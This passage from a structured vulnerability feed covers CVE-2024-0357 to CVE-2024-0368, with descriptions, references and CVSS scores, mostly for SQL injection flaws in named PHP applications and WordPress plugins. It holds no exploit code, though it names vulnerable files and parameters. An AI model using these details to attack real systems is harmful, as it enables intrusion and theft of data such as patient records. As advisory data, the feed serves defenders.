"name" : "https://vuldb.com/?ctiid.250124", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250124", "name" : "https://vuldb.com/?ctiid.250124", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250124", "name" : "https://vuldb.com/?id.250124", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250124", "name" : "https://vuldb.com/?id.250124", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in coderd-repos Eva 1.0.0 and classified as critical. Affected by this issue is some unknown functionality of the file /system/traceLog/page of the component HTTP POST Request Handler. The manipulation of the argument property leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250124." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:coderd-repos:eva:1.0.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-10T01:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0358", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/Po2N8SpTuzrV", "name" : "https://note.zhaoj.in/share/Po2N8SpTuzrV", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/Po2N8SpTuzrV", "name" : "https://note.zhaoj.in/share/Po2N8SpTuzrV", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250125", "name" : "https://vuldb.com/?ctiid.250125", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250125", "name" : "https://vuldb.com/?ctiid.250125", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250125", "name" : "https://vuldb.com/?id.250125", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250125", "name" : "https://vuldb.com/?id.250125", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in DeShang DSO2O up to 4.1.0. It has been classified as critical. This affects an unknown part of the file /install/install.php. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250125 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:csdeshang:dso2o:*:*:*:*:*:*:*:*", "versionEndIncluding" : "4.1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-10T01:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0359", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/ZJQcicadawings/VulSql/blob/main/Simple%20Online%20Hotel%20Reservation%20System%20login.php%20has%20Sqlinjection.pdf", "name" : "https://github.com/ZJQcicadawings/VulSql/blob/main/Simple%20Online%20Hotel%20Reservation%20System%20login.php%20has%20Sqlinjection.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/ZJQcicadawings/VulSql/blob/main/Simple%20Online%20Hotel%20Reservation%20System%20login.php%20has%20Sqlinjection.pdf", "name" : "https://github.com/ZJQcicadawings/VulSql/blob/main/Simple%20Online%20Hotel%20Reservation%20System%20login.php%20has%20Sqlinjection.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250126", "name" : "https://vuldb.com/?ctiid.250126", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250126", "name" : "https://vuldb.com/?ctiid.250126", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250126", "name" : "https://vuldb.com/?id.250126", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250126", "name" : "https://vuldb.com/?id.250126", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Simple Online Hotel Reservation System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250126 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:simple_online_hotel_reservation_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-10T02:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0360", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL4.docx", "name" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL4.docx", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL4.docx", "name" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL4.docx", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250127", "name" : "https://vuldb.com/?ctiid.250127", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250127", "name" : "https://vuldb.com/?ctiid.250127", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250127", "name" : "https://vuldb.com/?id.250127", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250127", "name" : "https://vuldb.com/?id.250127", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in PHPGurukul Hospital Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin/edit-doctor-specialization.php. The manipulation of the argument doctorspecilization leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250127." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:hospital_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-10T02:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0361", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL7.docx", "name" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL7.docx", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL7.docx", "name" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL7.docx", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250128", "name" : "https://vuldb.com/?ctiid.250128", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250128", "name" : "https://vuldb.com/?ctiid.250128", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250128", "name" : "https://vuldb.com/?id.250128", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250128", "name" : "https://vuldb.com/?id.250128", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in PHPGurukul Hospital Management System 1.0. Affected is an unknown function of the file admin/contact.php. The manipulation of the argument mobnum leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250128." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:hospital_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-10T03:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0362", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL8.docx", "name" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL8.docx", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL8.docx", "name" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL8.docx", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250129", "name" : "https://vuldb.com/?ctiid.250129", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250129", "name" : "https://vuldb.com/?ctiid.250129", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250129", "name" : "https://vuldb.com/?id.250129", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250129", "name" : "https://vuldb.com/?id.250129", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in PHPGurukul Hospital Management System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/change-password.php. The manipulation of the argument cpass leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-250129 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:hospital_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-10T03:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0363", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL10.docx", "name" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL10.docx", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL10.docx", "name" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL10.docx", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250130", "name" : "https://vuldb.com/?ctiid.250130", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250130", "name" : "https://vuldb.com/?ctiid.250130", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250130", "name" : "https://vuldb.com/?id.250130", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250130", "name" : "https://vuldb.com/?id.250130", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in PHPGurukul Hospital Management System 1.0. Affected by this issue is some unknown functionality of the file admin/patient-search.php. The manipulation of the argument searchdata leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250130 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:hospital_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-10T03:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0364", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL11.docx", "name" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL11.docx", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL11.docx", "name" : "https://github.com/laoquanshi/PHPGurukul-Hospital-Management-System/blob/main/PHPGurukul%20Hospital%20Management%20System%20SQL11.docx", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250131", "name" : "https://vuldb.com/?ctiid.250131", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250131", "name" : "https://vuldb.com/?ctiid.250131", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250131", "name" : "https://vuldb.com/?id.250131", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250131", "name" : "https://vuldb.com/?id.250131", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file admin/query-details.php. The manipulation of the argument adminremark leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250131." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:hospital_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-10T03:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0365", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/4b8b9638-d52a-40bc-b298-ae1c74788c18/", "name" : "https://wpscan.com/vulnerability/4b8b9638-d52a-40bc-b298-ae1c74788c18/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/4b8b9638-d52a-40bc-b298-ae1c74788c18/", "name" : "https://wpscan.com/vulnerability/4b8b9638-d52a-40bc-b298-ae1c74788c18/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Fancy Product Designer WordPress plugin before 6.1.5 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by adminstrators." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "6.1.5", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-18T19:15Z", "lastModifiedDate" : "2025-05-05T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0366", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-639" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/starbox/trunk/core/UserSettings.php", "name" : "https://plugins.trac.wordpress.org/browser/starbox/trunk/core/UserSettings.php", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/starbox/trunk/core/UserSettings.php", "name" : "https://plugins.trac.wordpress.org/browser/starbox/trunk/core/UserSettings.php", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3028775/starbox/trunk?contextall=1&old=3000701&old_path=%2Fstarbox%2Ftrunk", "name" : "https://plugins.trac.wordpress.org/changeset/3028775/starbox/trunk?contextall=1&old=3000701&old_path=%2Fstarbox%2Ftrunk", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3028775/starbox/trunk?contextall=1&old=3000701&old_path=%2Fstarbox%2Ftrunk", "name" : "https://plugins.trac.wordpress.org/changeset/3028775/starbox/trunk?contextall=1&old=3000701&old_path=%2Fstarbox%2Ftrunk", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c47601b4-bf16-4f59-b5f3-584a8eac7c67?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c47601b4-bf16-4f59-b5f3-584a8eac7c67?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c47601b4-bf16-4f59-b5f3-584a8eac7c67?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c47601b4-bf16-4f59-b5f3-584a8eac7c67?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Starbox – the Author Box for Humans plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.4.7 via the action function due to missing validation on a user controlled key. This makes it possible for subscribers to view plugin preferences and potentially other user settings." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:squirrly:starbox:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.4.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0367", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045122%40unlimited-elements-for-elementor&new=3045122%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045122%40unlimited-elements-for-elementor&new=3045122%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045122%40unlimited-elements-for-elementor&new=3045122%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3045122%40unlimited-elements-for-elementor&new=3045122%40unlimited-elements-for-elementor&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/47853750-0bf1-4df3-9c56-c6852543cfad?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/47853750-0bf1-4df3-9c56-c6852543cfad?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/47853750-0bf1-4df3-9c56-c6852543cfad?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/47853750-0bf1-4df3-9c56-c6852543cfad?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Unlimited Elements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link field of an installed widget (e.g., 'Button Link') in all versions up to, and including, 1.5.96 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:unlimited-elements:unlimited_elements_for_elementor:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.5.96", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-30T05:15Z", "lastModifiedDate" : "2025-01-30T16:01Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0368", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://developers.hubspot.com/docs/api/webhooks#manage-settings-via-api", "name" : "https://developers.hubspot.com/docs/api/webhooks#manage-settings-via-api", "refsource" : "", "tags" 